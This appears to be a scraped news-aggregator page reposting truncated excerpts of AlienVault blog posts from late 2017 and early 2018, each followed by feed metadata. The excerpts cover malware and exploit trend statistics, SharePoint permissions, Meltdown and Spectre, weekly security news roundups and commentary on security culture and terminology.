to help prioritise popular malware families: Malware families AlienVault customers detect the most; Which malware domains are observed the most frequently by Cisco’s Umbrella DNS; and Malware families with the highest number of individual samples Which malware families do our customers detect the most? The following table describes the malware that we detected most frequently on our customers networks: This table represents malware detected by AlienVault as it communicates across a network, in 2017. This data is biased towards families that we have named network detections for. That means this table is a good representation of malware that is actively running on networks, though it’s important to also review other statistics on malware that has been blocked from running. The #1 ranked malware, njRat, is particularly popular in the Middle East. It’s a fairly simple .NET backdoor and Youtube is full of videos of how amateur users can deploy it. We often see it packed with a seemingly endless supply of custom packers to evade anti-virus. Whilst the vast bulk of njRat users are low-level criminals, it is also frequently used in targeted political attacks in the Middle East. A Youtube guide for using njRat The #2 ranked malware, NetWire, is primarily used by low-end criminals to steal banking details. Again, it is a freely available tool and has also been abused by targeted attackers too. The top malware we saw for Linux was China ELF DDoS. We saw little malware for Mac, though the adware MacKeeper was popular. Which malware domains are observed the most frequently? We matched known malicious domains from AlienVault OTX against Umbrella DNS’s record of the most visited domains by their customers. From that we produced this table of the “most popular malicious domains”: The column ]]> 2018-01-23T14:00:00+00:00 http://feeds.feedblitz.com/~/519532080/0/alienvault-blogs~OTX-Trends-Part-Malware www.secnews.physaphae.fr/article.php?IdArticle=459640 False None APT33,Wannacry,APT 33 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Being conscientious of SharePoint security is simple if you understand the basics. SharePoint is a Microsoft platform which is designed to integrate with Microsoft Office. Microsoft launched the product in 2001. SharePoint is useful for thousands of organizations worldwide because it facilitates sharing documents on private web servers. SharePoint can be purchased as a separate product to deploy on your own intranet web servers, or you can use SharePoint Online as a component of many Office 365 packages. SharePoint Online is hosted on Microsoft’s own servers.. But poorly secured web servers and web applications can make organizations vulnerable to cyber-attack. Some of a company’s documents that are distributed through SharePoint may contain sensitive or proprietary information, and you don’t want them to fall into the hands of cyber attackers who could be either internal or external to your network! This quick guide will show you how to use and deploy SharePoint in a secure way so your organization can enjoy the convenience and functionality of SharePoint without introducing vulnerabilities to your corporate network. SharePoint security permission levels There are various different types of permissions you can grant users in your SharePoint system. Full Control- These users have all possible SharePoint permissions, and this permission is granted to all members of the Owners group by default. Be careful about which users you place in the Owners security group or otherwise grant Full Control permission. The best practice here is to only grant a limited number of administrators this permission. Edit- This permission enables users to add, edit, and delete lists, and to view, add, update, and delete documents and list items. By default, all users in the Members security group have this permission. So don’t place users in the Members group who only need to view, read, or contribute documents. Design- Users with this permission can create lists and document libraries. They can also make sites look pretty by editing pages, applying themes, style sheets, and borders. No security group is assigned this permission automatically. So if you want some users to be able to make aesthetic changes to your SharePoint site pages who aren’t administrators in your Owners group with Full Control, then you’ll have to manually assign this permission to another group or to individual users. Contribute- This is a more limited version of the Edit permission. Users with the Contribute permission can add, update, view, and delete documents and list items. Read- This permission should be granted to users who just need to view and download documents, and  may also need to see historical versions of documents. Restricted Read- These users can view pages and documents, but they can’t see historical versions of documents or user permissions. In most cases where a user only needs to be able to read the documents on a site, this is the best permission to grant them. View Only- These users can view pages, items and documents. They can only download documents that cannot be viewed in their web browser. Limited Access- This permission only grants users some access to a specific page or file as opposed to an entire site. This level is automatically assigned by SharePoint when you provide access to one specific item. You can’t directly grant this permi]]> 2018-01-22T14:00:00+00:00 http://feeds.feedblitz.com/~/519262616/0/alienvault-blogs~SharePoint-Security-Best-Practices www.secnews.physaphae.fr/article.php?IdArticle=459641 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Dan Klinedist to pen his thoughts in a thought-provoking post that will probably leave you with more questions than answers. The 100 Billion Dollar Infosec Question | Dan Klinedinst, Medium IT Security Spending to reach $96 billion in 2018 | Dark Reading Putting the bug in bounty I’m a big fan of bug bounties, I think that they have a lot of benefits. But, as with any emerging service, there will be issues. One of them is differentiating between Bug Bounty and Security Consulting or Testing. And that can cause some problems, which are very well articulated by John Carroll. BugBounty != Security Consulting | CTU Security Inside Uber’s $100,000 Payment to a Hacker, and the Fallout | NY Times Mirai Okiru botnet targets ARC-based IoT devices For those of you who don't know, ARC (Argonaut RISC Core) processors are the second most widely used processors in the world and can be found in all manner of unassuming connected devices, from car tech to storage, home and mobile devices. The new Mirai botnet, known as Mirai Okiru, is going after them with the aim knock them offline with distributed denial of service (DDoS) attacks. Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices | Security Affairs Mirai Okiru is a botnet that's going after ARC-based IoT gadgets | The Inquirer Mirai Okiru: New DDoS botnet targets ARC-based IoT devices | CSO Mental Models & Security: Thinking Like a Hacker Is it weird that I’m including one of my own articles from this week? Is that the equivalent of someone liking their own facebook posts? I’ve been reading up on mental models lately a lot and thought a lot could be applied to security, or as is often said, to think like a hacker. I listed seven of my favourite models in this Dark Reading contributed article. Mental Models & Security: Thinking Like a Hacker | Dark Reading LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials ]]> 2018-01-19T14:00:00+00:00 http://feeds.feedblitz.com/~/518651014/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-Jan www.secnews.physaphae.fr/article.php?IdArticle=459642 False Guideline Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC One of the coolest things about editing in the tech space, for a word nerd like me, is that the language is brand-new, ad-hoc, and usually made up on the fly by an engineer or security researcher frantically trying to communicate a new idea without saying something like, “and then the thing happens…” The technical term for a word entirely new to the language, describing a previously undescribed event, generated by a subject matter expert in that field, is a protologism. In other fields, like literary criticism, sociology, and politics — places that, frankly, move slower than we do — a word can remain a protologism for years while people debate and consider, before finally accepting it, and it becomes a neologism. Neologisms are words that have been widely adopted, and where the initial source can be pretty readily ascertained. Because technical editors and technical writers are also looking for ways to describe that thing that happens, we tend to be early adopters of protologisms, and move words along the spectrum to neologisms as fast as we upgrade the technology itself. As Shakespeare said in Henry V, “We, my dear, are the makers of fashion.” We also are the greatest generators of new language since Shakespeare (who added something around 2,000 words in a veritable Renaissance for the English language as it existed then). And because our teams tend to be highly diverse, made up of people from all over the world, the words we generate in tech tend to be words that can be plugged in across languages – they’re not unique to any particular language, and tend to resist translation. They end up being naturalized, or transliterated, rather than strictly translated. These transliterations end up being generated often through TAP, or Think-Aloud Protocol, which is another beautiful thing technology processes has given the world (most of us call it “muttering to ourselves.”) There’s even a tech-specific word for what this article is about: netymology; the origin and derivation of technical terms. When you’re in the business of creating software that addresses newly-developing online threats, the terminology practically generates itself. A quick stroll through AlienVault’s  Open Threat Exchange® (OTX™) will show you all kinds of words that have never been defined. And it’s my job to get those into a glossary for you. It works like this: Attacker (not hacker, for the love of all things fluffy) attacks. Researchers discover. Pulse gets written. I read the pulses, identify the “…and then the thing happens” terms, research to see where along the protologism > neologism spectrum it falls by seeing if anyone anywhere else is talking about the word, and how they are talking about them, create a definition, and drop that into the glossary that then gets used in the documentation. I’m pretty serious about clear, easy to understand documentation. I think that we, who eat and sleep and breathe new technology, owe it to the users who aren’t in the room where the “…and then the thing happens” moments occur, to make those language evolutions as clear as possible, as u]]> 2018-01-18T14:00:00+00:00 http://feeds.feedblitz.com/~/518385366/0/alienvault-blogs~Shakespeares-Netymology www.secnews.physaphae.fr/article.php?IdArticle=459643 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC GitHub. Executive Summary Some of the standout findings from our data covering 2017 are: The most effective exploits quickly proliferate between a number of criminal and nation state groups. Some remain popular for a number of years after their initial discovery. njRat malware variants were the most prevalent malware we saw persisting on networks. Of the ten most popular domains associated with malware, four were sinkholed by MalwareTech. Confirmation of others’ findings of the changing targeted threat landscape. There has been a significant increase in reports on attackers reportedly located in Russia and North Korea. There has also been a significant drop in reports of activity emanating from groups operating from China. OTX Trends: Exploits This is the first of a three part series on the trends we identified in 2017: Part 1 focuses on exploits Part 2 will talk about the malware of concern and trends Part 3 will discuss threat actors and patterns Which exploits should I be most concerned about? There are many thousands of exploits that are assigned a CVE number every year, and many more that don’t go reported.  If you’re responsible for an organisation’s security, it’s important to know: Which ones are the most important to patch quickly? Which ones are being actively exploited in the wild? What exploits are being reported in vendor reports? The following table shows exploits in order of the number of times they have been referenced in vendor reports on OTX: A CVE 2017-0199 sample used by criminals This table is from a fairly small data-set of approximately 80 vendor reports from this 2017 – but it still provides a number of insights: Effective exploits proliferate quickly The #1 ranked exploit CVE-2017-0199 is extremely popular. It has been used by targeted attackers in locations as diverse as North Korea (FreeMilk), China (Winnti) and Iran (Oilrig). It has also been heavily abused by criminal gangs such as some of those deploying Dridex. ]]> 2018-01-16T14:00:00+00:00 http://feeds.feedblitz.com/~/517871006/0/alienvault-blogs~OTX-Trends-Part-Exploits www.secnews.physaphae.fr/article.php?IdArticle=459644 False None APT 34 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC full report by the ICO (PDF) is worth reading. It goes into a lot of detail around the vulnerabilities such as the attacker scanning using Nikto, and gaining access to a woefully out-of-date WordPress installation that was running its CMS. It also covers how credentials were stored in plaintext and how the attacker was able to access large amounts of personal data. There are many more details in the report, that I highly encourage you to read, but essentially it boils down to an absence of fundamental security controls, no assurance to verify systems were secured, and a lack of monitoring or detection controls in place. Carphone Warehouse cops £400k fine after hack exposed 3 meeellion folks’ data | The Register Britain fines Carphone Warehouse 400,000 pounds over data breach | Reuters Data protection bill amended to protect security researchers The UK has revealed amendments to its data protection bill to de-criminalise research into whether anonymised data sets are sufficiently anonymous. This is very good news for researchers who may have been worried they could be prosecuted for demonstrating weaknesses in anonymization. UK gov updates Data Protection bill to protect security researchers | The Inquirer UK Data Protection Bill tweaked to protect security researchers | The Register Data protection bill amended to protect security researchers | The Guardian Data Protection Bill | Parliament UK (pdf) Toy firm VTech fined over data breach VTech, the ‘smart’ toy manufacturer has been fined $650,000 by the FTC after exposing the data of millions of parents and children. Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security. FTC fines VTech toy firm over data b]]> 2018-01-12T14:00:00+00:00 http://feeds.feedblitz.com/~/516975104/0/alienvault-blogs~Things-I-hearted-this-week-th-Jan www.secnews.physaphae.fr/article.php?IdArticle=459645 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC For the love of all things glittery, you guys, here I am with this lovely platform from which to rant about language development around developing technology and what happens? Bruce freaking Schneier blogs about inappropriate language use around developing technology; specifically, that “Crypto” Is Being Redefined as Cryptocurrencies. I am all aswoon; I’ve been a serious Schneier fan for a really long time. So you can take it to the bank (see what I did there?) when he says, It is a stupid name. Woot! Because it is a stupid name. And this is precisely the sort of ridiculous media-propelled distortion that leads to really bad language use (no, not that kind of bad language. The other kind of bad language). And if Bruce backs me up, life is good. Turns out, Lorenzo Franceschi-Bicchierai (@lorenzoFB) also agrees with me. As a writer, I try to remind myself every day that words matter. For example, when I write about hackers, I try to keep in mind that the word has a controversial history and can have a certain connotation. (Gosh, where have we heard that rant before?) He goes on to say, But this is not just a matter of pedantic semantics. As Green explained, cryptography is starting to matter more and more in meatspace, where regular people live, people who might not know about revived 1990s tech policy controversies. Think of the legal battle between Apple and FBI, or popular and damaging malware like ransomware, which often use cryptographic functions to lock files. “If people know what ‘crypto’ is, they should know it as a real technology—not as some synonym for Bitcoin,” he said. So if you care about this, please politely correct people who incorrectly use the word “crypto.” Or maybe make fun of it, as Ryan Stortz, a security researcher in New York suggested. In a chat, he joked that he wants to start trolling people by referring to cryptocurrencies as “Block,” short for “blockchain technologies.” Honestly, though, whatever it takes. Our constant ally, the Merriam-Webster Online Dictionary, once again comes to the rescue. If you search “crypto” they let you know that it’s an abbreviation for the noun cryptography. For a word having to do with secrets, "cryptography" has a surprisingly transparent etymology. The word traces back to the Greek roots kryptos, meaning "hidden," and graphein, meaning "to write." "Kryptos" - which in turn traces to the Greek verb kryptein, meaning "to hide" - is a root shared by several English words, including "crypt," "cryptic," and "encrypt." "Krypton," the name of a colorless gaseous element used especially in some fluorescent lamps and photography flashes, also comes from "kryptos." The name was chosen because the gas is rare and hard to find. There is literally nothing in the word “crypto” th]]> 2018-01-11T14:00:00+00:00 http://feeds.feedblitz.com/~/516688338/0/alienvault-blogs~Cryptocurrency-Isnt-Crypto www.secnews.physaphae.fr/article.php?IdArticle=458720 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC You were just getting back into the swing of things after bringing in the New Year, and it happened. Like a huge firework exploding with a thump that you can feel through your body, the news of Meltdown and Spectre hit the media on January 3, 2018. Since the official disclosure of Meltdown and Spectre, there has been a flurry of news articles, as well as activity by the major processor and operating system vendors, and the community at large, to address these significant flaws. But, just what are these flaws, how are you impacted, and what should you do about them? About Spectre and Meltdown Discovered by researchers that include the Google Project Zero, several academic institutions, and some private companies, Spectre and Meltdown exploit design flaws existing in nearly all processors manufactured since 1995 that enable exfiltration of data within the CPU cache. Without getting into ‘too’ much detail: Meltdown (outlined in CVE-2017-5754) impacts Intel and Apple processors, and exploits the Intel Privilege Escalation and Speculative Escalation processor functions to read any memory on the system and execute code on the system. Spectre (outlined in CVE-2017-5715 and CVE-2017-5753) affects chips manufactured by Intel, Apple, ARM and AMD, and exploits the Branch Prediction and Speculative Execution processor functions to allow access to another user’s data within the same application, or even data from another application. But, “What is speculative execution and branch prediction?” I hear you ask. The quick explanation is that these are functions that were designed to increase the performance of the chip by predicting what the application or system needs next. If it predicts correctly, then the processed information becomes immediately available. It’s similar in concept to a fast food restaurant that prepares your food before you arrive, so that you don’t have to wait in line while they cook it. Of course, if you want a deeper explanation of the technology and the exploits, you can read the technical papers published on Meltdown and Spectre. A quick summary of the attacks can be seen in the following table, based on information from Daniel Miessler. Am I At Risk? More than likely you are at risk, given that the flaws affect nearly every processor manufactured from 1995 through to today. However, both exploits require that code be executed directly on the system, requiring access as a local administrator or user. This typically makes it difficult to exploit these vulnerabilities, although the Spectre flaw was able to be exploited through a JavaScript-based attack though unpatched browsers (noting that patches for many popular browsers have already been issued, so be sure to update them!). Are There Any Known Attacks That Use Meltdown or Spectre? So far, Meltdown and Spectre are not known to have been used to steal data. That said, compromise can be difficult to detect. The AlienVault Labs ]]> 2018-01-11T02:53:00+00:00 http://feeds.feedblitz.com/~/516579328/0/alienvault-blogs~Improve-Your-Readiness-To-Defeat-Meltdown-amp-Spectre www.secnews.physaphae.fr/article.php?IdArticle=457970 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC It was a great year in blogs for AlienVault! Here are the top blogs from 2017, selected by number of views from all sources. Drumroll please. Explain Bitcoin to Me by Tristan Johns. It’s an approachable but technical explanation of how Bitcoin works. MacSpy: OS X RAT as a Service by Peter Ewane. It’s about one of the first malware-as-a-service (MaaS) for OS X. Configuring Kali Linux on Amazon AWS Cloud for FREE by Irfan Shakeel. If you want to experiment with pentesting without spending money, this blog will let you know how. How Does Whonix Make Kali Linux Anonymous & How to Prevent It? by Irfan Shakeel. Learn what Whonix is and how it works, and how it can be used to go incognito while using Kali Linux. There’s also info on how to prevent folks from doing in in your corporate network. Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability by AlienVault Labs. The blog details findings on WannaCry as it started in May 2017. LockCrypt Ransomware Spreading via RDP Brute-Force Attacks by Chris Doman. Best Advice for a Career in Cyber Security by Ryan Leatherbury. Ryan discusses networking, conferences, blogs, InfoSec on Twitter, hands-on tools, mentors and more! It’s Only a Hacker if It’s Linus Himself by Laureen Hudson. At AlienVault, we stick to precisely descriptive terms; we have malicious actors, we have security researchers, but unless we have the fortune to be talking about Linus himself, you’ll never see hackers in our documentation.  How the Vote Hacking Was Done at DefCon25 by @notpandapants. From a guest blogger who participated. The Diebold ExpressPoll 5000 is a piece of election hardware that is compromised to the core, and creates a hacker-friendly platform for large-scale election manipulation, on multiple fronts. Interesting blog, but a little scary too. Red Teamers Can Learn Secrets by Purple Teaming by Haydn Johnson. Great guest blog by a practitioner, teaching us why Red Teamers Should “Purple Team it”. MacronLeaks – A Timeline of Events by Chris Doman. Chris discusses the implications of leaked documents and the 2017 French election. How to Prepare to Take the OSCP by Blade Soriano. Guest blogge]]> 2018-01-09T14:00:00+00:00 http://feeds.feedblitz.com/~/516119472/0/alienvault-blogs~Top-Blogs-from-%e2%80%98 www.secnews.physaphae.fr/article.php?IdArticle=457211 False None Wannacry None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Meltdown Attack, the website. Google Project Zero blog NCSC’s advice Replace CPU hardware – legit advice. Linus Torvald was not happy, and issued a strongly-worded statement Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks | Bleeping Computer Facebook and India’s controversial National ID Database Facebook has clarified that it’s not asking new users in India for their Aadhaar information while signing up for a new Facebook account. Aadhaar is India’s biometric ID system that links the demographic information of more than a billion Indians with their fingerprints and iris scans, and stores it in a centralized government-owned database that both government agencies and private companies can access to authenticate people’s identities. The program has been slammed by critics for enabling surveillance and violating privacy. Facebook said this was a “small test” that the company ran with a limited number of Indian users, and that its goal was to help new users understand how to sign up to Facebook with their real names. It sounds an awful lot like the “wallet inspector” in the school playground that would also then keep my money safe for me. Facebook Just Clarified That It Is Not Collecting Data From India's Controversial National ID Database |Buzzfeed Rs 500, 10 minutes, and you have access to billion Aadhaar details | The Tribune India Trackmageddon Two researchers have disclosed problems with hundreds of vulnerable GPS services using open APIs and trivial passwords (123456), resulting in a multitude of privacy issues including direct tracking. Further, many of the vulnerable services have open directories exposing logged data. For some, the vulnerabilities discovered and disclosed by Vangelis Stykas (@evstykas) and Michael Gruhn (@0x6d696368) aren't new. They were disclosed during Kiwicon in 2015 by Lachlan Temple, who demonstrated flaws in a popular car tracking immobilization device. ]]> 2018-01-05T14:00:00+00:00 http://feeds.feedblitz.com/~/515235074/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Jan www.secnews.physaphae.fr/article.php?IdArticle=455992 False None Uber,Wannacry None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC check this guest blog out. {snp-blog-twitter-poll-security-fail-122117} However, it was a trick question! Both are necessary, as pointed out in this reply. A false question. Fire fighters vs. fire safety inspectors. Both are essential. If the inspector were completely successful then the fire fighter would get bored. Fortunately, complete success is impossible for either. Keeps us all employed. — C J Czelling (@CJCzelling) December 10, 2017 I gave the third option for those unwilling to choose sides. However, given the choice of only one, the majority of people chose Blue Team. It does make sense, if you only have one or the other, you had better have the defenders rather than more challengers than the already-existent bad guys attacking your company on a regular basis. If you're a small company, you might have only one person or one person part-time in the role of InfoSec, so when constrained - Blue Team is where you'll invest. Marcus Carey, a noted Blue Teamer, summed it up nicely.  Blue team all the way. Add a dash of red to make it purple. — Marcus (@marcusjcarey) December 10, 2017 The fact that both are necessary was a consistent theme in the replies. There were several very specific comments around Purple teaming. It made me go back and re-read Haydn Johnson's blog on Purple Teaming from early 2017. Haydn makes the excellent point that Red Teamers benefit greatly by using some Blue Team tricks. Blue Teamers tend to know what really works, and the Red Team benefits from learning the Blue Team's Defense - Security Controls / Applications / Response. Here's a sampling of the Purple Team themed responses: Teamwork �� — Nathan (@NathOnSecurity) December 10, 2017 Purple obviously — Travis (@pinedtree) December 10, 2017 While I voted Blue Team, I have to say that I honestly feel as though a mixture of Blue and Red (Purple) is the best for ]]> 2018-01-04T14:00:00+00:00 http://feeds.feedblitz.com/~/514937126/0/alienvault-blogs~Whats-More-Important-the-Red-Team-or-the-Blue-Team www.secnews.physaphae.fr/article.php?IdArticle=455327 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC If you feel like it’s getting harder and more expensive to protect your company from cyber attacks, you’re not alone. From streamlined startups to global enterprises, organizations in every industry are feeling the crunch as the threats they’re facing rapidly evolve. The Ponemon Institute’s 2017 State of Endpoint Security Risk report provides a thorough and enlightening overview of what’s happening. Now in its fifth consecutive year, this highly regarded report analyzes survey responses from more than 600 IT and security practitioners located in the United States. This year’s edition highlighted a few startling stats as well as some unsettling trends.   What won’t surprise most IT professionals is that the threat of endpoint security risk has increased, due to both the rising number of attacks and the evolution of attack techniques. Also on the rise is the cost of attacks. Based on data collected for the report, the average total hard cost of a successful attack is more than $5 million, including IT and end-user productivity loss, system downtime, theft of information assets, and a variety of other damages. What may be overlooked, however, is that the complexity and day-to-day cost of defending against these attacks is becoming increasingly prohibitive. Evolving Attack Techniques Drive Higher Day-to-Day Prevention Costs Attackers are changing their approach based on what’s working. Looking at data for the past 12 months, the Ponemon report found that 54 percent of respondent organizations experienced one or more endpoint attacks that successfully compromised data assets and/or IT infrastructure. Of those successful attacks, 77 percent involved fileless techniques  designed to evade detection by abusing legitimate system tools or launching malicious code from memory. Fileless techniques have long been used by sophisticated hacking groups, who typically aim their attacks at high-level targets like governments and large corporations. It was only a matter of time before these techniques were more widely adopted by cyber criminals. Now, because fileless attack techniques are expressly designed to exploit gaps in traditional security solutions, organizations large and small are finding themselves vulnerable.   The urgent need to adapt existing protection to address fileless techniques is one of the primary factors driving up prevention costs. To begin with, the rapid proliferation of these types of attacks has caused organizations to lose faith in traditional antivirus (AV) security measures. As a result, companies are either replacing or supplementing their existing AV with new endpoint protection solutions. Unfortunately, because the majority of these options were designed to be used by large enterprise security teams they are typically too expensive and complex for mid-market organizations. Not only do these products incur up-front implementation costs in the form of professional installation services and other expenses, they also typically increase ongoing management costs because of things like: Greater expertise requirements: As traditional security solutions struggle to adapt to the new threats, both they and new entrants into the market are rolling out new features and functionality that make management more complex. This in turn can create additional service costs and also higher staffing fees as companies find they need to hire more senior IT security professionals to manage the advanced solutions. Additional time and resources spent on monitoring: The majority of solutions t]]> 2018-01-03T14:00:00+00:00 http://feeds.feedblitz.com/~/514697018/0/alienvault-blogs~Fileless-Attacks-are-Driving-Up-Security-Complexity-amp-Costs www.secnews.physaphae.fr/article.php?IdArticle=455328 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC I can’t think of many (well no) real industries that treat their users, peers, and customers with the same level of disdain. Imagine the automotive industry pushing a similar message. ‘On one hand we have seatbelts, ABS, airbags, five star safety features… and on the other hand we have dumb drivers.’ Or a gym stating, ‘We have personal trainers, protein shakes, free weights, machines, exercise classes… and on the other hand, we have lazy people that just want to binge watch shows and eat pizza.” Maybe a college could claim, ‘We have the best teachers in the world, pity about the unruly students. No, seriously, I mean, governments have been overthrown for a lot less. I’m frankly quite surprised there hasn’t been at least some level of civil unrest where an unruly mob surrounded the IT Security department, only to be dispersed by the CISO, dressed in full riot gear with a water cannon. While most security advice for users is all well and good, it is far from practical for the vast majority. How do I know this? Well, after giving out security advice for most of my career, I recently found myself falling short of much of my own advice. Our CISO at AlienVault, John McLeod, is a very nice man. But I did feel the urge to shake a fist at him a few days ago after I fell victim to a rather clever phishing email he’d sent out as part of an awareness campaign. It was well-crafted, had no grammatical errors, and in my haste while on my phone, I clicked on the embedded link. There goes my perfect record of not falling for a simulated phishing email. Then I was hit by a second surprise as I was informed by a service provider that my account had been disabled due to my credentials being found in a breach. I was grateful to the service provider for informing me, so I went about diligently changing my password, when I realised that this provider also had two-factor authentication which I had not enabled. Three strikes. I then spent the better part of the next two hours changing old passwords (I may have reused a couple), enabling two-factor authentication wherever it was available, and doing a search for all my various credentials on haveibeenpwned.com. It made me realise how security still has a long way to go in perfecting its user experience. Creating products that users genuinely find useful, usable, credible, accessible, valuable, or even desirable. But most of all, it made me realise, that while I may work in IT Security, I too am Dave.     
]]> 2018-01-02T14:00:00+00:00 http://feeds.feedblitz.com/~/514476918/0/alienvault-blogs~I-Am-Dave www.secnews.physaphae.fr/article.php?IdArticle=455329 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC And here we are, the last week of 2017! Congratulations for making it through and thank you for sticking with us. I really enjoy pulling together these weekly recaps, and I hope you enjoy them and find them informative. This week has been a quiet week as people seem to be in constant limbo as to whether they should be working or vacationing. But I searched tirelessly for you – because that’s just the kind of person I am. Enjoy, and hope to see you again in 2018. Vendor Analyst Briefings Our very own Kate Brew started off a discussion on Twitter a few days ago on how many vendors don’t know how to brief analysts. Anton Chuvakin of Gartner chimed in with a detailed listing of do’s and don’t’s, followed closely by Adrian Sanabria sharing his experiences. Not wanting to be left out, I also added my 2cents. Thus completing the trilogy. Important: How to Impress / Annoy an Analyst During a Vendor Briefing? Best / Worst Tips Here! | Anton Chuvakin, Gartner What is your product and what does it do? | Adrian Sanabria, Savage Security Analyst Vendor Briefings | Javvad Malik, J4vv4D Dressed for success Ed Amoroso offers some personal advice (especially for Millennials) on proper dress selection for men and women in the modern technology-based work environment that focuses on showing respect for others. Dress for Tech Success | Edward Amoroso, LinkedIn Credential Stuffing With quite literally billions of leaked credentials available online, it is highly likely that some of these will be credentials for your customers — or worse — from your employees or organisation. These details can then be used by nefarious people to then systematically attempt to log into your service/business, in an attempt to takeover these accounts. This article will provide you with an overview of why and how these attacks take place, as well as provide you with some fingerprints and identifiers to help you monitor your environment for these types of attacks. Credential Stuffing: How breached credentials are put to bad use. | Breachinsider.com Cryptocurrency mining malware Digimine spreads via Facebook messenger using a Google Chrome browser extension. This isn’t the first, and certainly won’t be the last example of cryptomining malware – something we may see increase in 2018. I should have added it to my list of predictions! Digimine Malware Steals Your Computer Power to Mine Crypto-Currency | eWeek Rating Citizens The Chinese government plans to launch its Social Credit System in 2020. The aim? To judge the trustworthiness – or otherwise – of its 1.3 billion residents ]]> 2017-12-29T14:00:00+00:00 http://feeds.feedblitz.com/~/513636112/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-th-December www.secnews.physaphae.fr/article.php?IdArticle=455330 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The last five years have seen a meteoric rise in the number of cyberattacks targeting healthcare organizations. Why? Because healthcare organizations boast some of the lowest security budgets of any industry, and personal healthcare records are worth a fortune on the dark web. Don’t believe me? Try this: Threats actors can make between $285,000 - $1.7 million from a single successful healthcare data breach. At that rate of return, it really shouldn’t be surprising to see how regularly healthcare breaches are hitting the headlines. If you’re in the healthcare industry, you’re probably feeling concerned. After all, healthcare organizations are highly complex environments and they can be a tremendous challenge to secure. Where should you even start? User-Centric Security Before you start spending big out on expensive security products, it makes sense to look at where the greatest risks lie. To do that, let’s take a look at the most common causes of healthcare data breaches in recent years. According to the 2016 Data Breach Investigations Report, produced by Verizon, there are three primary concerns: 1.Insiders (mainly negligence) 2.Lost or stolen devices 3.Phishing Do you notice anything about these threats? Here’s a clue: They aren’t rooted in technology. Quite the opposite, in fact, they’re all rooted in human behavior. Now, of course, security products can be invaluable in dealing with these threats. Devices can be encrypted, user access levels can be tightly controlled, and network activity can be monitored. You can even use spam filters and content scanners to weed out most malicious communications. But what you can’t do is totally isolate your users from malicious activity… it’s just not possible. One way or another you users will be exposed, and they must be ready to deal with it. By making the effort to properly train your users, you can hugely raise the security profile of your security organization. Out with the Old If I had to guess, I’d say your existing security awareness training is… less than comprehensive. You’re not alone. In most healthcare organizations, security awareness training wouldn’t even exist if it wasn’t a major requirement of HIPAA compliance. But knowing that the greatest threats to your organization are all rooted in human error, doesn’t that seem crazy? If you’re genuinely serious about reducing cyber risk, there are going to need to be some dramatic changes. Perhaps the biggest problem I see with the average security training program is that it is focused on completely the wrong metric: Awareness. Ask any behavioral psychologist whether having more information causes people to make better decisions, and you know what they’ll say? Absolutely not. That’s why, despite understanding more than ever about nutrition, we have a glo]]> 2017-12-27T14:00:00+00:00 http://feeds.feedblitz.com/~/513183718/0/alienvault-blogs~Why-Healthcare-Security-Awareness-Training-Doesn%e2%80%99t-Work-And-What-to-Do-About-It www.secnews.physaphae.fr/article.php?IdArticle=455331 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC NatWest_help why the homepage wasn’t secure the Bank initially tried to downplay the issue. But the bullying on Twitter forced the changes. Troy Hunt led the charge with “Securittyyyyy” much like Mel Gibson declared “Freeedom” in Braveheart, and NatWest finally gave in and upgraded within 48 hours. The Security Avengers (name pending) then fired a warning shot across other major banks which did not have secure homepages which has likely got many a security executive in a board room explaining likelihood and impact slides. I'm Sorry You Feel This Way NatWest, but HTTPS on Your Landing Page Is Important | Troy Hunt NatWest overhauls web security after online confrontation | Computing NatWest changes website security following heated exchange with cyber experts | ITPro NatWest bank spat prompts web security changes | BBC Why incident response is the best cybersecurity ROI Many times, there is little influence over what companies run and what it is run on. Chances are there will be failures or breaches – what is within the sphere of control is how well those incidents are responded to. Why incident response is the best cybersecurity ROI | CSO Online Welcome to the hotel hackifornia Christoph Brandstatter is managing director of the four-star Seehotel, Jagerwirt, in Austria's Alps. His hotel's electronic door locks and other systems were hacked for ransom four times, between December 2016 and January 2017. He paid a ransom of two bitcoins, at that time it was about €1,600 (£1,406: $1,882)". He’s trained his staff to recognise phishing emails that may seem genuine but actually contain malware. And he's moved back to traditional metal keys. Lock out: The Austrian hotel that was hacked four times | BBC The restaurant that didn’t exist People increasingly make decisions based on what they read on the internet. There’s an inherent trust about it. You book a cab through an app to take you to the airport where you board a plane which you booked online, to go and stay in a stranger's apartment you found through a different site. But it’s a fragile ecosystem that’s open to abuse, as one freelance writer discovered when his unique restaurant beat out thousands to earn to ranking well on TripAdvisor for a time, drawing a flood of interest. The problem was though, it didn’t exist. ]]> 2017-12-22T14:00:00+00:00 http://feeds.feedblitz.com/~/512302508/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-December www.secnews.physaphae.fr/article.php?IdArticle=454695 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Finding employment opportunities as a student is challenging, this is no new fact. Students are consistently facing troubles with seeking internships and co-op opportunities. I myself am a student, and I have found a solution that has been seemingly effective for career development thus far: personal branding. Personal branding helps students compensate for the work experience that we just haven’t had the opportunity of pursuing yet. Personal branding includes building a personal “brand” that people associate you with. You probably have already started developing your own personal 